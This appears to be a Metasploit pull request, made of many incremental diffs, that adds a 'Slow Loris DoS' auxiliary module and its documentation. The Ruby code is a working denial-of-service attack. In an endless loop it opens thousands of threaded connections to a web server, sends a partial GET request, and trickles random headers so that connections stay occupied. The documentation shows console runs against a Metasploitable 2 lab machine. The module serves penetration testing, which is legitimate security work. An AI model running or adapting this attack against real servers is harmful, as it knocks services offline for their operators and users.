### PR TITLE
Slow Loris

### DIFF
--- a/documentation/modules/auxiliary/dos/http/slow_loris.md
+++ b/documentation/modules/auxiliary/dos/http/slow_loris.md
@@ -22,10 +22,10 @@ Vulnerable app versions include:
 ### Apache/2.2.8 - Ubuntu 8.04
 
 ```
-msf > use auxiliary/dos/http/slow_loris5
-msf auxiliary(slow_loris5) > show options 
+msf > use auxiliary/dos/http/slow_loris
+msf auxiliary(slow_loris) > show options 
 
-Module options (auxiliary/dos/http/slow_loris5):
+Module options (auxiliary/dos/http/slow_loris):
 
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
@@ -34,9 +34,9 @@ Module options (auxiliary/dos/http/slow_loris5):
    RPORT    80               yes       The target port (TCP)
    THREADS  1000             yes       The number of concurrent threads
 
-msf auxiliary(slow_loris5) > set RHOST 192.168.216.129
+msf auxiliary(slow_loris) > set RHOST 192.168.216.129
 RHOST => 192.168.216.129
-msf auxiliary(slow_loris5) > run
+msf auxiliary(slow_loris) > run
 
 [*] 192.168.216.129:80 - Executing requests 1 - 1000...
 

--- a/documentation/modules/auxiliary/dos/http/slow_loris.md
+++ b/documentation/modules/auxiliary/dos/http/slow_loris.md
@@ -1,0 +1,43 @@
+Vulnerable Application
+
+This module tries to keep many connections to the target web server open and hold them open as long as possible.
+
+Vulnerable app versions include:
+
+- Apache HTTP Server 1.x and 2.x
+- Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta
+
+Download the Metasploitable 2 vulnerable Linux virtual machine from [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/).
+
+Verification Steps
+
+1. Start msfconsole
+2. Do: use auxiliary/dos/http/slow_loris
+3. Do: set RHOST
+4. Do: run
+5. Visit server URL in your web-browser.
+
+Scenarios
+
+Apache/2.2.8 - Ubuntu 8.04
+
+```
+msf > use auxiliary/dos/http/slow_loris.rb
+msf auxiliary(slow_loris) > show options 
+
+Module options (auxiliary/dos/http/slow_loris):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   RHOST    192.168.216.129  yes       The target address
+   RPORT    80               yes       The target port (TCP)
+   THREADS  5000             yes       The number of concurrent threads
+   TIMEOUT  60               yes       The maximum time in seconds to wait for each request to finish
+
+msf auxiliary(slow_loris) > set RHOST 192.168.216.129
+RHOST => 192.168.216.129
+msf auxiliary(slow_loris) > run
+
+[*] 192.168.216.129:80 - Executing requests 1 - 5000...
+
+```

--- a/documentation/modules/auxiliary/dos/http/slow_loris.md
+++ b/documentation/modules/auxiliary/dos/http/slow_loris.md
@@ -2,19 +2,19 @@
 
 This module tries to keep many connections to the target web server open and hold them open as long as possible.
 
+To test this module download and setup the Metasploitable 2 vulnerable Linux virtual machine available at [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/).
+
 Vulnerable app versions include:
 
 - Apache HTTP Server 1.x and 2.x
 - Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta
 
-Download the Metasploitable 2 vulnerable Linux virtual machine from [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/).
-
 ## Verification Steps
 
 1. Start msfconsole
-2. Do: use auxiliary/dos/http/slow_loris
-3. Do: set RHOST
-4. Do: run
+2. Do: `use auxiliary/dos/http/slow_loris`
+3. Do: `set RHOST`
+4. Do: `run`
 5. Visit server URL in your web-browser.
 
 ## Scenarios
@@ -22,22 +22,22 @@ Download the Metasploitable 2 vulnerable Linux virtual machine from [https://sou
 ### Apache/2.2.8 - Ubuntu 8.04
 
 ```
-msf > use auxiliary/dos/http/slow_loris.rb
-msf auxiliary(slow_loris) > show options 
+msf > use auxiliary/dos/http/slow_loris5
+msf auxiliary(slow_loris5) > show options 
 
-Module options (auxiliary/dos/http/slow_loris):
+Module options (auxiliary/dos/http/slow_loris5):
 
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
-   RHOST    192.168.216.129  yes       The target address
+   HEADERS  10               yes       The number of custom headers sent by each thread
+   RHOST                     yes       The target address
    RPORT    80               yes       The target port (TCP)
-   THREADS  5000             yes       The number of concurrent threads
-   TIMEOUT  60               yes       The maximum time in seconds to wait for each request to finish
+   THREADS  1000             yes       The number of concurrent threads
 
-msf auxiliary(slow_loris) > set RHOST 192.168.216.129
+msf auxiliary(slow_loris5) > set RHOST 192.168.216.129
 RHOST => 192.168.216.129
-msf auxiliary(slow_loris) > run
+msf auxiliary(slow_loris5) > run
 
-[*] 192.168.216.129:80 - Executing requests 1 - 5000...
+[*] 192.168.216.129:80 - Executing requests 1 - 1000...
 
 ```

--- a/documentation/modules/auxiliary/dos/http/slow_loris.md
+++ b/documentation/modules/auxiliary/dos/http/slow_loris.md
@@ -1,4 +1,4 @@
-Vulnerable Application
+## Vulnerable Application
 
 This module tries to keep many connections to the target web server open and hold them open as long as possible.
 
@@ -9,7 +9,7 @@ Vulnerable app versions include:
 
 Download the Metasploitable 2 vulnerable Linux virtual machine from [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/).
 
-Verification Steps
+## Verification Steps
 
 1. Start msfconsole
 2. Do: use auxiliary/dos/http/slow_loris
@@ -17,9 +17,9 @@ Verification Steps
 4. Do: run
 5. Visit server URL in your web-browser.
 
-Scenarios
+## Scenarios
 
-Apache/2.2.8 - Ubuntu 8.04
+### Apache/2.2.8 - Ubuntu 8.04
 
 ```
 msf > use auxiliary/dos/http/slow_loris.rb

--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
@@ -1,0 +1,71 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'Slow Loris DoS',
+      'Description'     => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. 
+                              It accomplishes this by opening connections to the target web server and sending a partial request. 
+                              Periodically, it will send subsequent requests, adding to—but never completing—the request.},
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'RSnake', # Vulnerability disclosure
+          'Daniel Teixeira' # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['URL', 'https://www.exploit-db.com/exploits/8976/']
+        ],
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptInt.new('THREADS', [true, 'The number of concurrent threads', 5000]),
+        OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 60])
+      ])
+  end
+
+  def thread_count
+    datastore['THREADS']
+  end
+
+  def timeout
+    datastore['TIMEOUT']
+  end
+
+  def run
+
+      starting_thread = 1
+      while true do
+        ubound = [thread_count].min
+        print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...")
+
+        threads = []
+        1.upto(ubound) do |i|
+          threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
+            begin
+              connect()
+              header = "GET / HTTP/1.1\r\n"
+              sock.puts(header)
+              sleep rand(1..15)
+              data = "X-a-#{rand(0..1000)}: b\r\n"
+              sock.puts(data)
+            end
+          end
+        end
+
+        threads.each(&:join)
+        print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}")
+        starting_thread += ubound
+      end
+  end
+end

--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
@@ -60,13 +60,14 @@ class MetasploitModule < Msf::Auxiliary
         1.upto(thread_count) do |i|
           threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
             begin
-              connect()
-              sock.puts(header)
+              current_sock = connect(global=false)
+              current_sock.puts(header)
               headers.times do
                 data = "X-a-#{rand(0..1000)}: b\r\n"
-                sock.puts(data)
+                current_sock.puts(data)
                 sleep rand(1..timeout)
               end
+              disconnect(nsock=current_sock)
             end
           end
         end

--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
@@ -45,8 +45,9 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-
       starting_thread = 1
+      header = "GET / HTTP/1.1\r\n"
+    
       while true do
         ubound = [thread_count].min
         print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...")
@@ -56,7 +57,6 @@ class MetasploitModule < Msf::Auxiliary
           threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
             begin
               connect()
-              header = "GET / HTTP/1.1\r\n"
               sock.puts(header)
               10.times do
                 data = "X-a-#{rand(0..1000)}: b\r\n"

--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
@@ -63,7 +63,7 @@ class MetasploitModule < Msf::Auxiliary
               current_sock = connect(global=false)
               current_sock.puts(header)
               headers.times do
-                data = "X-a-#{rand(0..1000)}: b\r\n"
+                data = Rex::Text.rand_text_alpha(3) + "-#{rand(0..1000)}: b\r\n"
                 current_sock.puts(data)
                 sleep rand(1..timeout)
               end

--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
       'Name'            => 'Slow Loris DoS',
       'Description'     => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. 
                               It accomplishes this by opening connections to the target web server and sending a partial request. 
-                              Periodically, it will send subsequent requests, adding to—but never completing—the request.},
+                              Periodically, it will send subsequent requests, adding to but never completing the request.},
       'License'         => MSF_LICENSE,
       'Author'          =>
         [
@@ -22,7 +22,9 @@ class MetasploitModule < Msf::Auxiliary
         ],
       'References'      =>
         [
-          ['URL', 'https://www.exploit-db.com/exploits/8976/']
+          [ 'CVE', '2007-6750' ],
+          [ 'CVE', '2010-2227' ],
+          [ 'URL', 'https://www.exploit-db.com/exploits/8976/' ]
         ],
     ))
 
@@ -56,9 +58,11 @@ class MetasploitModule < Msf::Auxiliary
               connect()
               header = "GET / HTTP/1.1\r\n"
               sock.puts(header)
-              sleep rand(1..15)
-              data = "X-a-#{rand(0..1000)}: b\r\n"
-              sock.puts(data)
+              10.times do
+                data = "X-a-#{rand(0..1000)}: b\r\n"
+                sock.puts(data)
+                sleep rand(1..15)
+              end
             end
           end
         end

--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
@@ -47,12 +47,12 @@ class MetasploitModule < Msf::Auxiliary
   def run
       starting_thread = 1
       header = "GET / HTTP/1.1\r\n"
+      threads = []
     
       while true do
         ubound = [thread_count].min
         print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...")
-
-        threads = []
+        
         1.upto(ubound) do |i|
           threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
             begin
@@ -66,9 +66,7 @@ class MetasploitModule < Msf::Auxiliary
             end
           end
         end
-
         threads.each(&:join)
-        print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}")
         starting_thread += ubound
       end
   end

--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(
       info,
       'Name'            => 'Slow Loris DoS',
-      'Description'     => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. 
+      'Description'     => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.
                               It accomplishes this by opening connections to the target web server and sending a partial request.
                               Periodically, it will send subsequent requests, adding to but never completing the request.},
       'License'         => MSF_LICENSE,
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary
         Opt::RPORT(80),
         OptInt.new('THREADS', [true, 'The number of concurrent threads', 1000]),
         OptInt.new('HEADERS', [true, 'The number of custom headers sent by each thread', 10]),
-		OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 15])
+        OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 15])
       ])
   end
 
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary
   def headers
     datastore['HEADERS']
   end
-  
+
   def timeout
     datastore['TIMEOUT']
   end

--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
       info,
       'Name'            => 'Slow Loris DoS',
       'Description'     => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.
-                              It accomplishes this by opening connections to the target web server and sending a partial request. 
+                              It accomplishes this by opening connections to the target web server and sending a partial request.
                               Periodically, it will send subsequent requests, adding to but never completing the request.},
       'License'         => MSF_LICENSE,
       'Author'          =>

--- a/modules/auxiliary/dos/http/slow_loris.rb
+++ b/modules/auxiliary/dos/http/slow_loris.rb
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(
       info,
       'Name'            => 'Slow Loris DoS',
-      'Description'     => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible. 
+      'Description'     => %q{Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.
                               It accomplishes this by opening connections to the target web server and sending a partial request. 
                               Periodically, it will send subsequent requests, adding to but never completing the request.},
       'License'         => MSF_LICENSE,
@@ -48,11 +48,11 @@ class MetasploitModule < Msf::Auxiliary
       starting_thread = 1
       header = "GET / HTTP/1.1\r\n"
       threads = []
-    
       while true do
+
         ubound = [thread_count].min
         print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...")
-        
+
         1.upto(ubound) do |i|
           threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i|
             begin


### PR DESCRIPTION
Slow Loris DoS auxiliary module

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/dos/http/slow_loris`
- [ ] `set RHOST "Metasploitable2 IP Address"`
- [ ] `run`